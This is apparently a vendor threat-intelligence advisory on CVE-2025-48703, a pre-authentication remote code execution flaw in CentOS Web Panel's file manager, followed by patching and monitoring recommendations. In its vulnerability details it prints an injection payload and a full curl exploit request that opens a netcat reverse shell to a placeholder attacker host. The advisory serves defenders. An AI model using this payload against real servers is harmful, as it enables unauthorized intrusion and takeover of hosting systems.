CVE-2025-48703: Patch Now or Risk Full Server Compromise via CentOS Web Panel

Published Date: November 6, 2025
Category: ShadowOpsIntel
Share:

CVE-2025-48703 is a severe remote code execution (RCE) flaw in CentOS Web Panel (CWP), affecting more than 200,000 internet-facing servers globally. The flaw allows unauthenticated attackers to execute arbitrary system commands by exploiting a combination of authentication bypass and command injection issues in the CWP user panel’s file management module. This bug has a high risk of exploitation, especially with public PoCs and a Metasploit module already available.

Severity: Critical

Vulnerability Details

  1. Vulnerability Type: Pre-authenticated Remote Code Execution
  2. Affected Component: CentOS Web Panel (CWP) versions before 0.9.8.1205, typically on CentOS 7. Interface exposed on port 2083 (user panel).
  3. CVSS Score: 9.0
  4. Vulnerability Chain (Two-Part Exploit)
    1. Authentication Bypass
      • The CWP file manager’s permission change endpoint (POST /myuser/index.php? module=filemanager&acc=changePerm) fails to verify session tokens or user credentials.
      • Mechanism: By stripping the user identifier from the URL and sending the request with a valid username, attackers bypass authentication.
    2. Command Injection via t_total Parameter
      • The server calls the chmod system command when processing a file permission change request. The t_total parameter, which is intended to pass the file permission mode (e.g., 644), is not properly sanitized.
      • Mechanism: This lack of sanitization allows an attacker to inject arbitrary shell commands, typically using command substitution techniques like $()$, into the t_total field.
      • Example payload: t_total=$(nc attacker_ip 9999 -e /bin/bash)
  5. Full Exploit Scenario
    Combining both flaws, a malicious actor who knows a valid (non-root) username can:
    • Craft a curl request without authentication
    • Inject arbitrary shell commands via the t_total parameter
    • Gain a reverse shell or execute commands remotely under that user’s privileges
      Final payload: curl -kis ‘https://target:2083/username/index.php?module=filemanager&acc =changePerm’ \ –data ‘fileName=.bashrc&currentPath=/home/username&t_total=$(nc attacker_ip 9999 -e /bin/bash)’

Recommendations

  1. Immediately upgrade CWP to version 0.9.8.1205 or later.
  2. Restrict access to the CWP user interface (port 2083) to trusted IP ranges only via firewall or network ACLs.
  3. Monitor logs for:
    • Unusual chmod command executions
    • Suspicious curl or web requests to /index.php?module=filemanager&acc=changePerm
    • Reverse shell attempts or outgoing connections to uncommon IPs/ports
    • New or modified .bashrc, .ssh, or cron entries
  4. Audit all existing user accounts in CWP. Remove/disable unused or legacy users. Enforce strong password policies and enable 2FA (if supported).
  5. Assume compromise if using unpatched versions. Perform a full forensic review, including outbound connection logs, web access logs, and local user activity. Rebuild and re-secure affected servers where compromise is confirmed or cannot be ruled out.

Source:

  • https://fenrisk.com/rce-centos-webpanel
  • https://findsec.org/index.php/blog/458-cwp-cve-2025-48703-remote-code-execution

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Talk to an expert